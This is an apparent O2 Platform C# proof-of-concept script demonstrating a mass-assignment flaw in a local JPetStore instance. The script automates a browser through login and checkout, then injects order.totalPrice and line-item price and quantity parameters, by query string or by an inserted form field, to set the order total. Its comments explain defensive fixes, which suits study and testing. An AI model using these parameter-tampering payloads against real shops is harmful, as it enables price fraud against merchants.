// O2 Platform script (FluentSharp + WatiN; see the //O2Ref directives at the end of the file).
// Proof of concept for the JPetStore "AutoBinding" issue (the class generally called
// mass assignment): the checkout confirmation request to newOrder.do?_finish=true is
// replayed with extra `order.*` request parameters, and the PoC expects the rendered
// order total to follow the client-supplied value rather than the one the server
// computed from the cart (scrollToTotal prints the value it should have been, 18.50).
// Everything runs against a JPetStore instance on loopback and is driven through an
// embedded IE window; nothing here is parameterised for another host.
// Defensive reading: any property reachable by name through the request binder is
// client-writable unless the bindable fields are an explicit allow-list (e.g. Spring's
// DataBinder.setAllowedFields); prices, quantities and totals must be recomputed
// server-side, and unexpected `order.*` parameters on a checkout request are a cheap
// detection signal.
var topPanel = "JPetStore 'AutoBinding Vulnerability' PoC".popupWindow(1000,700).insert_LogViewer();
//var topPanel = panel.clear().add_Panel();
// Control strip above the browser (the 40 is presumably a height in pixels — unverified).
var actionPanel = topPanel.insert_Above(40);
// Embedded IE with a navigation bar; silent(true) presumably suppresses IE dialogs — unverified.
var ie = topPanel.add_IE_with_NavigationBar().silent(true);
// Base URL of the target. The trailing dot on the host ("127.0.0.1.") is probably
// deliberate: it is a common way to stop IE bypassing a local debugging proxy for
// loopback traffic. Note that the hard-coded URLs further down are inconsistent with
// this value: the one in loginPlaceAnOrderAndGoToCheckout has no trailing dot.
var server = "http://127.0.0.1.:8080";
ie.open(server + "/jpetstore/shop/signonForm.do");
//ie.inject_FirebugLite();
// Signs in: open the sign-on form, fill both fields, submit the second form on the
// page via script, and block until the navigation completes.
Action<string,string> login =
(username, password) => {
ie.open(server + "/jpetstore/shop/signonForm.do");
ie.field("username",username);
ie.field("password",password);
ie.eval("document.forms[1].submit()");
ie.waitForComplete();
};
// Drives a normal purchase up to the order confirmation page (newOrder.do):
// enter the store, sign in if not already signed in, pick the FISH category,
// product FI-FW-01, add it to the cart, proceed to checkout, continue to newOrder.do.
// Every later exploit variation starts from the state this leaves the browser in.
Action loginPlaceAnOrderAndGoToCheckout =
()=>{
ie.open("http://127.0.0.1:8080/jpetstore");
ie.link("Enter the Store").click();
//login if needed
// Misnamed: this matches the sign-ON link (signonForm.do), i.e. it is non-null
// exactly when the user is not signed in yet. first() is assumed to return null
// for an empty sequence, which is what the notNull() check below relies on.
var signOffLink = ie.links().where((link)=> link.url().contains("signonForm.do")).first();
if(signOffLink.notNull())
{
signOffLink.click();
// Demo credentials used throughout this PoC (also at the bottom of the script).
login("j2ee", "pwd1");
}
ie.links().where((link)=> link.url().contains("FISH"))[0].click();
ie.link("FI-FW-01 ").flash().click();
ie.links().where((link)=> link.url().contains("addItemToCart"))[0].flash().click();
ie.links().where((link)=> link.url().contains("checkout.do"))[0].flash().click();
ie.links().where((link)=> link.url().contains("newOrder.do"))[0].flash().click();
};
// Locates the first TD whose HTML contains "Total:", scrolls it into view and appends
// a reminder of the legitimate total, so the effect of the tampered request is visible
// next to the real number. The injected markup closes <h2> with "<h2>" instead of "</h2>";
// harmless in practice but a typo.
Action scrollToTotal =
()=>{
var tdElement = ie.elements().elements("TD").toList().Where((element)=> element.innerHtml().notNull() && element.innerHtml().contains("Total:")).first();
tdElement.scrollIntoView();
tdElement.injectHtml_beforeEnd("<h2><p align=right>Look at the Total value from the table above (it should be 18.50)</p><h2>");
};
// Variation 1: reach the confirmation page, submit it once the normal way, then re-request
// the finishing URL with `payload` appended to the query string. With an empty payload
// this is the "Normal Request" baseline used by the UI link below. Because the base URL
// already ends in "&" and the payloads below start with "&", the query contains "&&";
// servers generally tolerate that.
Action<string> exploit_Variation_1 =
(payload) => {
loginPlaceAnOrderAndGoToCheckout();
//ie.buttons()[1].flash().click();
ie.eval("document.forms[1].submit()");
ie.waitForComplete();
ie.open(server + "/jpetstore/shop/newOrder.do?_finish=true&" + payload);
scrollToTotal();
};
// Overrides only the order total through the binder.
Action<string> exploit_Variation_1_SetTotalPrice =
(totalPrice) => {
var payload = "&order.totalPrice={0}".format(totalPrice);
exploit_Variation_1(payload);
};
// Same delivery as above, but also writes nested/indexed property paths
// (order.lineItems[0].*), showing that the binder reaches collection elements too.
// Wired to the UI link labelled "Exploit Variation #2" (the label and the handler
// name do not agree).
Action<string> exploit_Variation_1_SetItemPriceQuantityAndTotalPrice =
(totalPrice) => {
var payload = "&order.totalPrice={0}&order.lineItems[0].unitPrice=12&order.lineItems[0].quantity=12".format(totalPrice);
exploit_Variation_1(payload);
};
// Variation 2: same bind, different transport. An extra <input name='order.totalPrice'>
// is injected into the real checkout form next to billToFirstName and submitted with it,
// so the override travels as a regular form field instead of a query-string parameter;
// the finishing URL is then opened without any payload. Wired to the UI link labelled
// "Exploit Variation #3". This URL repeats the loopback host literally instead of using `server`.
Action<string> exploit_Variation_2 =
(totalPrice) => {
loginPlaceAnOrderAndGoToCheckout();
ie.field("order.billToFirstName").flash()
.injectHtml_afterEnd("<br>Total Price:<input type=text name='order.totalPrice' value='{0}'/>".format(totalPrice));
//ie.buttons()[1].flash().click();
ie.eval("document.forms[1].submit()");
ie.waitForComplete();
ie.open("http://127.0.0.1.:8080/jpetstore/shop/newOrder.do?_finish=true");
scrollToTotal();
};
//ie.disableFlashing();
// UI wiring: desiredPrice tracks the textbox (initialised to "1.99" via set_Text), the
// checkbox toggles element flashing, and each link runs one scenario. Note the label /
// handler mismatch: "#2" runs exploit_Variation_1_SetItemPriceQuantityAndTotalPrice and
// "#3" runs exploit_Variation_2.
var desiredPrice = "";
actionPanel.add_Label("Desired Total Price:").top(4)
.append_TextBox("").onTextChange((text) => desiredPrice = text).set_Text("1.99")
.append_CheckBox("Disable flashing",(value)=> { if (value) ie.disableFlashing(); else ie.enableFlashing(); })
.append_Link("Normal Request", ()=> exploit_Variation_1("")).top(24).left(105)
.append_Link("Exploit Variation #1 (set TotalPrice) ", ()=> exploit_Variation_1_SetTotalPrice(desiredPrice))
.append_Link("Exploit Variation #2 (set ItemPrice, Item Quantity and TotalPrice) ", ()=> exploit_Variation_1_SetItemPriceQuantityAndTotalPrice(desiredPrice))
.append_Link("Exploit Variation #3 (set TotalPrice) ", ()=> exploit_Variation_2(desiredPrice))
.append_Link("loginPlaceAnOrderAndGoToCheckout; ",()=> loginPlaceAnOrderAndGoToCheckout());
// Initial state on load: open the store (host with trailing dot again) and sign in.
ie.open("http://127.0.0.1.:8080/jpetstore");
//actionPanel.link("Normal Request").click();
login("j2ee", "pwd1");
// Script return value, displayed by the O2 host.
return "done";
//using FluentSharp.Watin
//O2Ref:FluentSharp.Watin.dll
//O2Ref:Watin.Core.dll